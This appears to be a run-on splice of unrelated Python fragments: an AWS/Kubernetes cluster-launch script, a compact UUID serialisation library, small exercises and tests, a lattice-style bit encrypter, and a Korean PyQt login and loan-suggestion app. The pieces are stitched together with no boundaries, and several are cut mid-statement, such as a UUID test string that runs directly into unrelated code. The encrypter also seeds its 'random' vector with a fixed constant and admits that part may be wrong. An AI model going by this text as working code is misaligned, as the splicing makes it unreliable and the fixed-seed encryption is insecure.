< 5: print('Usage: ./create_cluster.py min_mem_instances min_ebs_instances' + ' min_func_instances scheduler_instances routing_instance' + ' benchmark_instances ') print() print('If no SSH key is specified, we will use the default SSH key ' + '(/home/ubuntu/.ssh/id_rsa). The corresponding public key is' + ' assumed to have the same path and end in .pub.') print() print('If no config file is specific, the default base config file in ' + '$FLUENT_HOME/conf/kvs-base.yml will be used.') sys.exit(1) mem, ebs, func, sched, route, bench = parse_args(sys.argv[1:], 6, int) cluster_name = util.check_or_get_env_arg('FLUENT_CLUSTER_NAME') kops_bucket = util.check_or_get_env_arg('KOPS_STATE_STORE') aws_key_id = util.check_or_get_env_arg('AWS_ACCESS_KEY_ID') aws_key = util.check_or_get_env_arg('AWS_SECRET_ACCESS_KEY') conf_file = '../conf/kvs-base.yml' if len(sys.argv) <= 7 else sys.argv[7] ssh_key = '/home/ubuntu/.ssh/id_rsa' if len(sys.argv) <= 8 else sys.argv[8] create_cluster(mem, ebs, func, sched, route, bench, conf_file, ssh_key, cluster_name, kops_bucket, aws_key_id, aws_key) from webserver.storage.factory import StorageFactory def test_connect_to_cloud_storage(): storage = StorageFactory.cloud() print(storage) test_connect_to_cloud_storage()from AlphaGomoku.process_data import * tuples = [ ([(0, 0), (1, 1), (2, 2)], (3, 3), 1.0), ([(0, 0), (2, 2)], (1, 1), 1.0), ([], (1, 1), 2.0) ] nodes = tuples_to_tree(tuples) print([(node.data_container, node.children) for node in nodes]) json_object = tree_to_json(nodes) print(json_object) nodes = json_to_tree(json_object) print([(node.data_container, node.children) for node in nodes]) tuples = tree_to_tuples(nodes) print(tuples) # -*- coding: utf-8 -*- # # Copyright (C) 2015-2018 Dubalu LLC. All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # from __future__ import absolute_import, division __all__ = ['UUID', 'uuid', 'uuid1', 'uuid3', 'uuid4', 'uuid5', 'unserialise', 'encode', 'decode', 'encode_uuid', 'decode_uuid', 'NAMESPACE_DNS', 'NAMESPACE_URL', 'NAMESPACE_OID', 'NAMESPACE_X500'] import six import uuid as _uuid try: from . import base_x except ValueError: import base_x try: from .mertwis import MT19937 except ValueError: from mertwis import MT19937 def fnv_1a(num): # calculate FNV-1a hash fnv = 0xcbf29ce484222325 while num: fnv ^= num & 0xff fnv *= 0x100000001b3 fnv &= 0xffffffffffffffff num >>= 8 return fnv def xor_fold(num, bits): # xor-fold to n bits: folded = 0 while num: folded ^= num num >>= bits return folded def unserialise(serialised): uuids = [] while serialised: uuid, length = UUID._unserialise(serialised) uuids.append(uuid) serialised = serialised[length:] return uuids def encode(serialised, encoding='encoded'): if isinstance(serialised, six.string_types): if encoding == 'guid': return b';'.join('{%s}' % u for u in unserialise(serialised)) elif encoding == 'urn': return b'urn:uuid:' + ';'.join(unserialise(serialised)) elif encoding == 'encoded': if ord(serialised[0]) != 1 and ((ord(serialised[-1]) & 1) or (len(serialised) >= 6 and ord(serialised[-6]) & 2)): return b'~' + UUID.ENCODER.encode(serialised) return b';'.join(unserialise(serialised)) raise ValueError("Invalid serialised UUID: %r" % serialised) def decode(encoded): if isinstance(encoded, six.string_types): if len(encoded) > 2: if encoded[0] == '{' and encoded[-1] == '}': encoded = encoded[1:-1] elif encoded.startswith('urn:uuid:'): encoded = encoded[9:] if encoded: encoded = encoded.split(';') if isinstance(encoded, (list, tuple)): serialised = b''.join(UUID._decode(u) for u in encoded) return serialised raise ValueError("Invalid encoded UUID: %r" % encoded) def encode_uuid(uuid): if uuid is None: raise ValueError("Cannot encode None") if not isinstance(uuid, UUID): uuid = UUID(uuid) return uuid.encode() def decode_uuid(code): return UUID.unserialise(decode(code)) class UUID(six.binary_type, _uuid.UUID): """ Compact UUID Anonymous UUID is 00000000-0000-1000-8000-010000000000 """ # 0 1 2 3 # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | time_low | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | time_mid | time_hi_and_version | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # |clk_seq_hi_res | clk_seq_low | node (0-1) | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | node (2-5) | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # # time = 60 bits # clock = 14 bits # node = 48 bits ENCODER = base_x.b59 UUID_TIME_EPOCH = 0x01b21dd213814000 UUID_TIME_YEAR = 0x00011f0241243c00 UUID_TIME_INITIAL = UUID_TIME_EPOCH + (2016 - 1970) * UUID_TIME_YEAR UUID_MIN_SERIALISED_LENGTH = 2 UUID_MAX_SERIALISED_LENGTH = 17 UUID_LENGTH = 36 TIME_BITS = 60 VERSION_BITS = 64 - TIME_BITS COMPACTED_BITS = 1 SALT_BITS = 7 CLOCK_BITS = 14 NODE_BITS = 48 PADDING_BITS = 64 - COMPACTED_BITS - SALT_BITS - CLOCK_BITS PADDING1_BITS = 64 - COMPACTED_BITS - NODE_BITS - CLOCK_BITS VARIANT_BITS = 2 TIME_MASK = ((1 << TIME_BITS) - 1) SALT_MASK = ((1 << SALT_BITS) - 1) CLOCK_MASK = ((1 << CLOCK_BITS) - 1) NODE_MASK = ((1 << NODE_BITS) - 1) COMPACTED_MASK = ((1 << COMPACTED_BITS) - 1) VERSION_MASK = ((1 << VERSION_BITS) - 1) VARIANT_MASK = ((1 << VARIANT_BITS) - 1) # Lengths table VL = [ [[0x1c, 0xfc], [0x1c, 0xfc]], # 4: 00011100 11111100 00011100 11111100 [[0x18, 0xfc], [0x18, 0xfc]], # 5: 00011000 11111100 00011000 11111100 [[0x14, 0xfc], [0x14, 0xfc]], # 6: 00010100 11111100 00010100 11111100 [[0x10, 0xfc], [0x10, 0xfc]], # 7: 00010000 11111100 00010000 11111100 [[0x04, 0xfc], [0x40, 0xc0]], # 8: 00000100 11111100 01000000 11000000 [[0x0a, 0xfe], [0xa0, 0xe0]], # 9: 00001010 11111110 10100000 11100000 [[0x08, 0xfe], [0x80, 0xe0]], # 10: 00001000 11111110 10000000 11100000 [[0x02, 0xff], [0x20, 0xf0]], # 11: 00000010 11111111 00100000 11110000 [[0x03, 0xff], [0x30, 0xf0]], # 12: 00000011 11111111 00110000 11110000 [[0x0c, 0xff], [0xc0, 0xf0]], # 13: 00001100 11111111 11000000 11110000 [[0x0d, 0xff], [0xd0, 0xf0]], # 14: 00001101 11111111 11010000 11110000 [[0x0e, 0xff], [0xe0, 0xf0]], # 15: 00001110 11111111 11100000 11110000 [[0x0f, 0xff], [0xf0, 0xf0]], # 16: 00001111 11111111 11110000 11110000 ] def __new__(cls, hex=None, bytes=None, bytes_le=None, fields=None, int=None, version=None, data=None): try: string = data if data is not None else hex u = cls._uuid(hex=hex, bytes=bytes, bytes_le=bytes_le, fields=fields, int=int, version=version, data=data) self = six.binary_type.__new__(cls, u) self.__dict__['int'] = u.int return self except Exception: return six.binary_type.__new__(cls, string) def __init__(self, hex=None, bytes=None, bytes_le=None, fields=None, int=None, version=None, data=None): if 'int' not in self.__dict__: u = self._uuid(hex=hex, bytes=bytes, bytes_le=bytes_le, fields=fields, int=int, version=version, data=data) self.__dict__['int'] = u.int @classmethod def _uuid(cls, hex=None, bytes=None, bytes_le=None, fields=None, int=None, version=None, data=None): if [hex, bytes, bytes_le, fields, int, data].count(None) != 5: raise TypeError('need one of hex, bytes, bytes_le, fields, or int') if data is not None: num = 0 for d in data: num <<= 8 num |= ord(d) node = ((num << 1) & 0xfe0000000000) | num & 0x00ffffffffff num >>= 47 clock_seq_low = num & 0xff num >>= 8 clock_seq_hi_variant = num & 0x3f num >>= 6 time_low = num & 0xffffffff num >>= 32 time_mid = num & 0xffff num >>= 16 time_hi_version = num & 0xfff num >>= 12 if num: raise ValueError("UUIDs can only store as much as 15 bytes") time_hi_version |= 0x1000 # Version 1 clock_seq_hi_variant |= 0x80 # Variant: RFC 4122 node |= 0x010000000000 # Multicast bit set fields = (time_low, time_mid, time_hi_version, clock_seq_hi_variant, clock_seq_low, node) elif hex is not None: if isinstance(hex, six.string_types): hex = cls._decode_uuid(hex, 1) if isinstance(hex, _uuid.UUID): int, hex = hex.int, None return _uuid.UUID(hex=hex, bytes=bytes, bytes_le=bytes_le, fields=fields, int=int, version=version) @classmethod def _is_serialised(cls, serialised, count=None): while serialised: if count is not None: if not count: return False count -= 1 size = len(serialised) if size < 2: return False byte0 = ord(serialised[0]) if byte0 == 1: length = 17 else: length = size q = bool(byte0 & 0xf0) for i in six.moves.range(13): if cls.VL[i][q][0] == (byte0 & cls.VL[i][q][1]): length = i + 4 break if size < length: return False serialised = serialised[length:] return True @classmethod def _decode(cls, encoded, count=None): if len(encoded) >= 7 and encoded[0] == '~': serialised = cls.ENCODER.decode(encoded) if cls._is_serialised(serialised, count): return serialised u = cls(_uuid.UUID(encoded)) return u.serialise() @classmethod def _decode_uuid(cls, encoded, count=None): if len(encoded) >= 7 and encoded[0] == '~': serialised = cls.ENCODER.decode(encoded) if cls._is_serialised(serialised, count): return cls.unserialise(serialised) u = _uuid.UUID(encoded) return u @classmethod def _unserialise_condensed(cls, serialised): size = len(serialised) length = size byte0 = ord(serialised[0]) q = bool(byte0 & 0xf0) for i in six.moves.range(13): if cls.VL[i][q][0] == (byte0 & cls.VL[i][q][1]): length = i + 4 break if size < length: raise ValueError("Bad encoded uuid") list_bytes_ = list(serialised[:length]) byte0 &= ~cls.VL[i][q][1] list_bytes_[0] = chr(byte0) meat = 0 for s in list_bytes_: meat <<= 8 meat |= ord(s) compacted = meat & 1 meat >>= cls.COMPACTED_BITS if compacted: salt = meat & cls.SALT_MASK meat >>= cls.SALT_BITS clock = meat & cls.CLOCK_MASK meat >>= cls.CLOCK_BITS time = meat & cls.TIME_MASK node = cls._calculate_node(time, clock, salt) else: node = meat & cls.NODE_MASK meat >>= cls.NODE_BITS clock = meat & cls.CLOCK_MASK meat >>= cls.CLOCK_BITS time = meat & cls.TIME_MASK if time: if compacted: time = ((time << cls.CLOCK_BITS) + cls.UUID_TIME_INITIAL) & cls.TIME_MASK elif not (node & 0x010000000000): time = (time + cls.UUID_TIME_INITIAL) & cls.TIME_MASK time_low = time & 0xffffffff time_mid = (time >> 32) & 0xffff time_hi_version = (time >> 48) & 0xfff time_hi_version |= 0x1000 clock_seq_low = clock & 0xff clock_seq_hi_variant = (clock >> 8) & 0x3f | 0x80 # Variant: RFC 4122 return cls(fields=(time_low, time_mid, time_hi_version, clock_seq_hi_variant, clock_seq_low, node)), length @classmethod def _unserialise_full(cls, serialised): if len(serialised) < 17: raise ValueError("Bad encoded uuid %s" % repr(serialised)) return cls(bytes=serialised[1:17]), 17 @classmethod def _unserialise(cls, serialised): if serialised is None or len(serialised) < 2: raise ValueError("Bad encoded uuid %s" % repr(serialised)) if (serialised and ord(serialised[0]) == 1): return cls._unserialise_full(serialised) else: return cls._unserialise_condensed(serialised) @classmethod def _calculate_node(cls, time, clock, salt): if not time and not clock and not salt: return 0x010000000000 seed = 0 seed ^= fnv_1a(time) seed ^= fnv_1a(clock) seed ^= fnv_1a(salt) g = MT19937(seed & 0xffffffff) node = g() node <<= 32 node |= g() node &= cls.NODE_MASK & ~cls.SALT_MASK node |= salt node |= 0x010000000000 # set multicast bit return node @classmethod def _serialise(cls, self): variant = ord(self.bytes[8]) & 0xc0 version = ord(self.bytes[6]) >> 4 if variant == 0x80 and version == 1: node = self.node & cls.NODE_MASK clock = self.clock_seq & cls.CLOCK_MASK time = self.time & cls.TIME_MASK compacted_time = ((time - cls.UUID_TIME_INITIAL) & cls.TIME_MASK) if time else 0 compacted_time_clock = compacted_time & cls.CLOCK_MASK compacted_time >>= cls.CLOCK_BITS compacted_clock = clock ^ compacted_time_clock if node & 0x010000000000: salt = node & cls.SALT_MASK else: salt = fnv_1a(node) salt = xor_fold(salt, cls.SALT_BITS) salt = salt & cls.SALT_MASK compacted_node = cls._calculate_node(compacted_time, compacted_clock, salt) compacted = node == compacted_node if compacted: meat = compacted_time meat <<= cls.CLOCK_BITS meat |= compacted_clock meat <<= cls.SALT_BITS meat |= salt meat <<= cls.COMPACTED_BITS meat |= 1 else: if not (node & 0x010000000000): if time: time = (time - cls.UUID_TIME_INITIAL) & cls.TIME_MASK meat = time meat <<= cls.CLOCK_BITS meat |= clock meat <<= cls.NODE_BITS meat |= node meat <<= cls.COMPACTED_BITS serialised = [] while meat or len(serialised) < 4: serialised.append(meat & 0xff) meat >>= 8 length = len(serialised) - 4 if serialised[-1] & cls.VL[length][0][1]: if serialised[-1] & cls.VL[length][1][1]: serialised.append(cls.VL[length + 1][0][0]) else: serialised[-1] |= cls.VL[length][1][0] else: serialised[-1] |= cls.VL[length][0][0] serialised = ''.join(chr(c) for c in reversed(serialised)) if compacted_time: compacted_time = ((compacted_time << cls.CLOCK_BITS) + cls.UUID_TIME_INITIAL) & cls.TIME_MASK else: compacted_node = None compacted_time = None compacted_clock = None serialised = chr(0x01) + self.bytes return serialised, compacted_node, compacted_time, compacted_clock @classmethod def new(cls, data=None, compacted=None): if data is not None: return UUID(data=data) num = UUID(_uuid.uuid1()) if compacted or compacted is None: num = num.compact_crush() or num return num @classmethod def unserialise(cls, serialised): uuid, length = cls._unserialise(serialised) if length > len(serialised): raise ValueError("Invalid serialised uuid %s" % serialised) return uuid def serialise(self): if '_serialised' not in self.__dict__: self.__dict__['_serialised'], self.__dict__['_compacted_node'], self.__dict__['_compacted_time'], self.__dict__['_compacted_clock'] = self._serialise(self) return self.__dict__['_serialised'] def compact_crush(self): if '_compacted_node' not in self.__dict__: self.serialise() node = self.__dict__['_compacted_node'] if node is not None: time = self.__dict__['_compacted_time'] clock = self.__dict__['_compacted_clock'] time_low = time & 0xffffffff time_mid = (time >> 32) & 0xffff time_hi_version = (time >> 48) & 0xfff time_hi_version |= 0x1000 clock_seq_low = clock & 0xff clock_seq_hi_variant = (clock >> 8) & 0x3f | 0x80 # Variant: RFC 4122 return self.__class__(fields=(time_low, time_mid, time_hi_version, clock_seq_hi_variant, clock_seq_low, node)) def encode(self, encoding='encoded'): return encode(self.serialise(), encoding) def data(self): num = 0 version = self.version variant = self.clock_seq_hi_variant & 0x80 if variant == 0x80 and version == 1 and self.node & 0x010000000000: num <<= 12 num |= self.time_hi_version & 0xfff num <<= 16 num |= self.time_mid & 0xffff num <<= 32 num |= self.time_low & 0xffffffff num <<= 6 num |= self.clock_seq_hi_variant & 0x3f num <<= 8 num |= self.clock_seq_low & 0xff num <<= 47 num |= ((self.node & 0xfe0000000000) >> 1) | (self.node & 0x00ffffffffff) data = [] while num: data.append(chr(num & 0xff)) num >>= 8 return ''.join(reversed(data)) def iscompact(self): if '_compacted_node' not in self.__dict__: self.serialise() return self.__dict__['_compacted_node'] == self.node # Compatibility with builtin uuid def uuid(data=None, compacted=None): return UUID.new(data=data, compacted=compacted) def uuid1(node=None, clock_seq=None): return UUID(_uuid.uuid1(node=node, clock_seq=clock_seq)) def uuid3(namespace, name): return UUID(_uuid.uuid3(namespace, name)) def uuid4(): return UUID(_uuid.uuid4()) def uuid5(namespace, name): return UUID(_uuid.uuid5(namespace, name)) # The following standard UUIDs are for use with uuid3() or uuid5(). NAMESPACE_DNS = UUID('6ba7b810-9dad-11d1-80b4-00c04fd430c8') NAMESPACE_URL = UUID('6ba7b811-9dad-11d1-80b4-00c04fd430c8') NAMESPACE_OID = UUID('6ba7b812-9dad-11d1-80b4-00c04fd430c8') NAMESPACE_X500 = UUID('6ba7b814-9dad-11d1-80b4-00c04fd430c8') if __name__ == '__main__': errors = 0 uuids = [ # Full: ('5759b016-10c0-4526-a981-47d6d19f6fb4', ['5759b016-10c0-4526-a981-47d6d19f6fb4'], repr('5759b016-10c0-4526-a981-47d6d19f6fb4'), repr('\x01WY\xb0\x16\x10\xc0E&\xa9\x81G\xd6\xd1\x9fo\xb4')), ('e8b13d1b-665f-4f4c-aa83-76fa782b030a', ['e8b13d1b-665f-4f4c-aa83-76fa782b030a'], repr('e8b13d1b-665f-4f4c-aa83-76fa782b030a'), repr('\x01\xe8\xb1=\x1bf_OL\xaa\x83v\xfax+\x03\n')), # Condensed: ('00000000-0000-1000-8000-000000000000', ['00000000-0000-1000-8000-000000000000'], repr('00000000-0000-1000-8000-000000000000'), repr('\x1c\x00\x00\x00')), ('11111111-1111-1111-8111-111111111111', ['11111111-1111-1111-8111-111111111111'], repr('~GcL2nemYXfTUrDbsYYiTDNc'), repr('\x0f\x88\x88\x88\x88\x88\x88\x88\x82"""""""')), # Condensed + Compacted: ('230c0800-dc3c-11e7-b966-a3ab262e682b', ['230c0800-dc3c-11e7-b966-a3ab262e682b'], repr('~SsQg3rJrx3P'), repr('\x06,\x02[\b9fW')), ('f2238800-debf-11e7-bbf7-dffcee0c03ab', ['f2238800-debf-11e7-bbf7-dffcee0c03ab'], repr('~SlMSibYTT8c'), repr('\x06.\x86*\x1f\xbb\xf7W')), # Condensed + Expanded: ('60579016-dec5-11e7-b616-34363bc9ddd6', ['60579016-dec5-11e7-b616-34363bc9ddd6'], repr('60579016-dec5-11e7-b616-34363bc9ddd6'), repr('\xe1\x17E\xcc)\xc4\x0bl,hlw\x93\xbb\xac')), ('4ec97478-c3a9-11e6-bbd0-a46ba9ba5662', ['4ec97478-c3a9-11e6-bbd0-a46ba9ba5662'], repr('4ec97478-c3a9-11e6-bbd0-a46ba9ba5662'), repr('\x0e\x89\xb7\xc3b\xb60 n, m = map(int, input().split()) path = [0] * n for i in range(m): a, b = map(int, input().split()) a -= 1 b -= 1 path[a] += 1 path[b] += 1 for i in range(n): print(path[i]) import logging import numpy import rvg from ciphertext import Ciphertext seed = 5684 def BitEncrypter(A, b, mbit, modulus, log=logging.getLogger(__name__)): mbit = 1 & mbit # we only want a bit m0 = len(A) # r is probably not correct... r = numpy.ndarray([m0, 1], dtype=numpy.integer) #generate random vector r<-{0,1}^m? s = rvg.RVG(m0, 2, seed) sp = s.generate() sp = next(sp) r[:, 0] = sp[:] & 1 # Need to use dot here, because in numpy dot is actually matrix multiplication while * is not. # Very intuitive! \s log.debug("R={r}\nA={A}\n m={m}".format(r=r, A=A, m=mbit)) v = numpy.asarray(numpy.mod(A.T.dot(r).T, modulus)) w = (b.T.dot(r) + mbit) % modulus ciphertext = Ciphertext(numpy.squeeze(v), w.item(0), 0) log.debug("Ciphertext={c}".format(c=ciphertext)) return ciphertext def MessageEncrypter(A, b, m, modulus, log=logging.getLogger(__name__)): bstring = bin(m) out = [] for i in range(2, len(bstring)): # Need to convert back to int, so that operation in BitEncrypter do not throw exceptions out.append(BitEncrypter(A, b, int(bstring[i]), modulus, log=log)) return out n = int(input ('Digite um número: ')) raiz = n** (1/2) dobro= n*2 triplo= n*3 print('O dobro de {} vale {}.'.format(n,dobro)) print('O triplo de {} vale {}.'.format(n,triplo)) print('A raiz quadrada de {} é igual a {:.2f}.'.format(n,pow(n,(1/2))))juanshishido/codewarskyu6/tests/test_autocomplete.py import unittest from kyu6.autocomplete import autocomplete class TestAutocomplete(unittest.TestCase): dictionary = ['abnormal', 'arm-wrestling', 'absolute', 'airplane', 'airport', 'amazing', 'apple', 'ball' ] def test_ai(self): self.assertEquals(['airplane', 'airport'], autocomplete('ai', self.dictionary)) def test_a(self): self.assertEquals(['abnormal', 'arm-wrestling', 'absolute', 'airplane', 'airport'], autocomplete('a', self.dictionary)) def test_nonalpha(self): self.assertEquals(['ball'], autocomplete('b$%^', self.dictionary)) 10-100 def SieveOfEratosthenes(n): prime = [True for i in range(n+1)] p = 2 while(p*p<=n): if prime[p] == True: for i in range(p*p,n+1,p): prime[i] = False p += 1 return prime x = SieveOfEratosthenes(50) for i in range(2,len(x)): if x[i]: print(i,end=' ') ############################################### # import required module import sys from PyQt5.QtWidgets import * from PyQt5.Qt import * import pandas as pd import numpy as np import matplotlib.pyplot as plt import random import time from module.LRUCache import * from module.astro_secret import * import module.linear_regression as lin ############################################### loginCache = LRUCache(1) countCache = LRUCache(2) prev_user = "" userTable = pd.read_csv('DB/userTable.csv') full_reg_Table = pd.read_csv('DB/full_reg_table.csv') loginCount = 0 loginAction = False # 로그인을 했는지 안했는지 알려주는 변수, 값이 False이면 로그인을 안했다는 뜻 loginedLine = -1 # 로그인한 계정이 몇번째 줄에 있는지 알려주는 변수, 값이 -1이면 로그인 안함 userID = [PWEncoding(Decoding(userTable['keyID'].iloc[i], userTable['Name'].iloc[i])) for i in range(len(userTable.index))] # 로그인 폼 class LoginForm(QWidget): def __init__(self): super().__init__() self.setWindowTitle("Astro - Login") self.resize(500, 600) pixmap = QPixmap('img/logo.png') lbl_img = QLabel() lbl_img.setPixmap(pixmap) # lbl_img = pixmap.scaled(300,300) lbl_img.setMaximumWidth(300) lbl_img.setMaximumHeight(300) layout = QGridLayout() layout2 = QHBoxLayout() self.lbl_ID = QLabel('ID') self.lbl_ID.setStyleSheet("color: #000000;" "border-style: solid;" "border-width: 2px;" "border-color: #AADBDD;" "background-color: #AADBDD;") self.lbl_PW = QLabel('Password') self.lbl_PW.setStyleSheet("color: #000000;" "border-style: solid;" "border-width: 2px;" "border-color: #AADBDD;" "background-color: #AADBDD;") layout2.addWidget(lbl_img) # label_name = QLabel("") self.lineEdit_ID = QLineEdit() self.lineEdit_ID.setPlaceholderText("아이디를 입력하세요.") self.lineEdit_ID.setMaximumWidth(120) layout.addWidget(self.lbl_ID, 1, 0) # layout.addWidget(label_name, 0, 0) layout.addWidget(self.lineEdit_ID, 1, 1) # label_password = QLabel("") self.lineEdit_password = QLineEdit() self.lineEdit_password.setPlaceholderText("패스워드를 입력하세요.") self.lineEdit_password.setMaximumWidth(120) layout.addWidget(self.lbl_PW, 1, 2) self.lineEdit_password.setEchoMode(QLineEdit.Password) # layout.addWidget(label_password, 0, 2) layout.addWidget(self.lineEdit_password, 1, 3) layout3 = QHBoxLayout() button_signup = QPushButton("로그인") button_signup.setMaximumWidth(120) button_signup.setMaximumHeight(80) button_signup.clicked.connect(self.login) layout3.addWidget(button_signup) # layout3.setRowMinimumHeight(2, 1) button_register = QPushButton("회원가입") button_register.setMaximumWidth(120) button_register.setMaximumHeight(80) button_register.clicked.connect(self.register) layout3.addWidget(button_register) # layout3.setRowMinimumHeight(2, 2) layout4 = QVBoxLayout() layout4.addLayout(layout2) layout4.addLayout(layout) layout4.addLayout(layout3) self.setLayout(layout4) """ # LRU Cache를 이용한 로그인 시스템 로직: 만약 잘못된 로그인 횟수가 5회 이상일 때 1초 딜레이 만약 ID 또는 Password를 입력하지 않고 로그인 버튼을 눌렀을 때 "ID 또는 PW를 입력해주세요."(이)라고 출력 만약 ID 또는 Password를 입력하고 로그인 버튼을 눌렀을 때 만약 loginCache.nodeMap에 입력한 ID값이라는 캐시에 카운트가 3 이상이라면 만약 userName과 입력한 ID값이 같다면 만약 loginCache.nodeMap에 userName이라는 key에 value값이 입력한 PW값을 해싱한 값과 같다면 loginAction을 True로 설정, loginCout를 0으로 설정 loginCache에 key는 입력한 ID값, value는 입력한 PW값을 해싱한 값 저장 '로그인에 성공했습니다.'(이)라고 출력 만약 loginCache.nodeMap에 userName이라는 key에 value값이 입력한 PW값을 해싱한 값과 다르면 '로그인에 실패했습니다.'(이)라고 출력 만약 loginCache.nodeMap에 입력한 ID값이라는 캐시에 카운트가 3 미만이라면 userTable에 index만큼 반복 enc_ID(이)라는 변수에 입력한 ID값을 암호화 enc_PW(이)라는 변수에 입력한 PW값을 해싱 만약 enc_ID[0](keyID) enc_ID[1](valueID)로 디코딩한 값이 userTable에 'keyID'(이)라는 열, i번째 행 데이터와 'Name'(이)라는 열, i번째 행 데이터로 디코딩한 값과 같다면 만약 enc_PW값이 입력한 PW값을 해싱한 값과 같다면 loginAction을 True로 설정, loginLine을 i로 설정과 함께 "로그인에 성공했습니다"(이)라고 출력 만약 enc_PW값이 입력한 PW값을 해싱한 값과 다르다면 '로그인에 실패했습니다.'(이)라고 출력 """ def login(self): msg = QMessageBox() start = time.time() global prev_user, loginCount, loginAction, loginedLine if loginCount >= 5: time.sleep(1) if not self.lineEdit_ID.text() or not self.lineEdit_password.text(): loginCount += 1 msg.setText('ID 또는 PW를 입력해주세요.') msg.exec_() else: # Cache Login if loginCache.nodeMap.get(self.lineEdit_ID.text(), [-1, 0])[1] >= 3: if prev_user == self.lineEdit_ID.text(): if loginCache.nodeMap.get(prev_user, [-1, 0])[0] == PWEncoding(self.lineEdit_password.text()): loginAction = True loginCount = 0 loginCache.put(self.lineEdit_ID.text(), PWEncoding(self.lineEdit_password.text())) print("Cache Login time :", time.time() - start) msg.setText('로그인에 성공했습니다.') msg.exec_() self.gomain() self.close() # 로그인 폼 끄기 else: loginCount += 1 msg.setText('로그인에 실패했습니다.') msg.exec_() # Default Login else: for i in range(len(userTable.index)): enc_ID = Encoding(self.lineEdit_ID.text()) enc_PW = PWEncoding(self.lineEdit_password.text()) if Decoding(enc_ID[0], enc_ID[1]) == Decoding(userTable['keyID'].iloc[i], userTable['Name'].iloc[i]): if enc_PW == userTable['Pw'].iloc[i]: loginAction = True loginedLine = i prev_user = Decoding( userTable['keyID'].iloc[i], userTable['Name'].iloc[i]) loginCache.put(prev_user, userTable['Pw'].iloc[i]) loginCount = 0 print("Login time :", time.time() - start) msg.setText('로그인에 성공했습니다.') msg.exec_() self.gomain() self.suggest() self.close() # 로그인 폼 끄기 else: loginCount += 1 msg.setText('로그인에 실패했습니다.') msg.exec_() break # 메인폼으로 가기 위한 시스템 def gomain(self): msg = QMessageBox() self.main = MainForm() # 팝업 회원가입 폼 self.main.setGeometry(QRect(100, 100, 180, 500)) # 팝업 self.main.show() def suggest(self): msg = QMessageBox() if loginAction == False: msg.setText("로그인이 필요합니다.") msg.exec_() else: usersum = lin.linear_regression_suggest(full_reg_Table, 'Age', 'Money', 'Credit_level', 'Grade', userTable['Age'].iloc[loginedLine], int(Decoding( userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])), userTable['Rate'].iloc[loginedLine]) if round(usersum) <= 1: res = "햇살론" elif 1 < round(usersum) <= 2: res = "금리 4% 인생핀다론" elif 2 < round(usersum) <= 3: res = "우리자유적금" elif 3 < round(usersum) <= 4: res = "우리적금" elif 4 < round(usersum) <= 5: res = "우리큐브" elif 5 < round(usersum): res = "두루두루정기예금" msg.setText(self.lineEdit_ID.text() + "님, " + res + " 상품은 어떠신가요?") msg.exec_() def register(self): msg = QMessageBox() self.signup = SignUpForm() # 팝업 회원가입 폼 self.signup.setGeometry(QRect(100, 100, 400, 200)) # 팝업 self.signup.show() # 회원가입 폼 표시 # 회원가입 폼 class SignUpForm(QWidget): def __init__(self): super().__init__() self.setWindowTitle("Astro - SignUp") self.resize(300, 500) layout = QGridLayout() label_name = QLabel("ID") self.lineEdit_ID = QLineEdit() self.lineEdit_ID.setPlaceholderText("아이디를 입력하세요.") layout.addWidget(label_name, 0, 0) layout.addWidget(self.lineEdit_ID, 0, 1) label_password = QLabel("Password") self.lineEdit_password = QLineEdit() self.lineEdit_password.setPlaceholderText("패스워드를 입력하세요.") layout.addWidget(label_password, 1, 0) layout.addWidget(self.lineEdit_password, 1, 1) label_password_check = QLabel("Password 확인") self.lineEdit_password_check = QLineEdit() self.lineEdit_password_check.setPlaceholderText("패스워드를 다시 입력하세요.") layout.addWidget(label_password_check, 2, 0) layout.addWidget(self.lineEdit_password_check, 2, 1) label_age = QLabel("나이") self.lineEdit_age = QLineEdit() self.lineEdit_age.setPlaceholderText("나이를 입력하세요.") layout.addWidget(label_age, 3, 0) layout.addWidget(self.lineEdit_age, 3, 1) button_signup = QPushButton("회원가입") button_signup.clicked.connect(self.signup) layout.addWidget(button_signup, 4, 1) layout.setRowMinimumHeight(4, 40) self.setLayout(layout) """ # 회원가입 시스템 로직: 만약 ID 또는 Password를 입력하지 않고 회원가입 버튼을 눌렀다면 "정보를 모두 입력해주세요"(이)라고 출력 만약 ID 또는 Password를 입력하고 회원가입 버튼을 눌렀다면 만약 입력한 ID값이 userTable에 'Name'(이)라는 열에 있다면 "이미 있는 아이디입니다"(이)라고 출력 만약 입력한 PW값과 입력한 re_PW값이 같지 않다면 "두 비밀번호가 일치하지 않습니다."(이)라고 출력 만약 입력한 ID값이 userTable에 'Name'(이)라는 열에 없다면 입력한 나이값을 int형으로 형변환 하는 과정에서 문제가 발생하지 않았을 때 새로운 계좌번호를 저장할 newAccli를 선언 무한 반복 0부터 18까지 반복 만약 i가 4 또는 9 또는 14일 